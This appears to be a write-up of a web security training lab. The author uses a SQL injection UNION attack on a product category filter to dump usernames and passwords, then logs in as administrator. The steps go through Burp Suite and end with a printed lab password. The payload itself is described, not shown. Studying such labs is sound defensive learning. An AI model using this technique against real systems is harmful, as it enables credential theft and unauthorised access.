Lab: SQL injection UNION attack, retrieving data from other tables
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
After you click on the ACCESS THE LAB button, it will take you to this website. As specified in the question above, this lab contains a SQL injection vulnerability in the product category filter. So before clicking on a category, I did turn on Burp Suite’s proxy to intercept the traffic.
This is the GET request we are sending to the server. Notice I selected the Accessories category. I am sending this to Repeater so I can experiment with this Request more freely.
We know from the question that there exists two columns: username and password and a table called users. All I did was passing those column names and table name into the right place using SQL Syntax.
Notice our previous black texts turned into red texts indicating that our SQL Syntax is now URL encoded. Without URL Encoding the syntax, the server wouldn’t understand our request.
Notice we got a response from the server with status code 200.
I selected Render option from the response. The render option renders the real UI of the website with our request instead of showing the HTML. Notice it returned usernames, administrator, wiener and their corresponding passwords.
administrator:kw4qlqndjpqxmymj0yll
I copied the password of the user administrator and logged in with the credential just like the question asked
Done!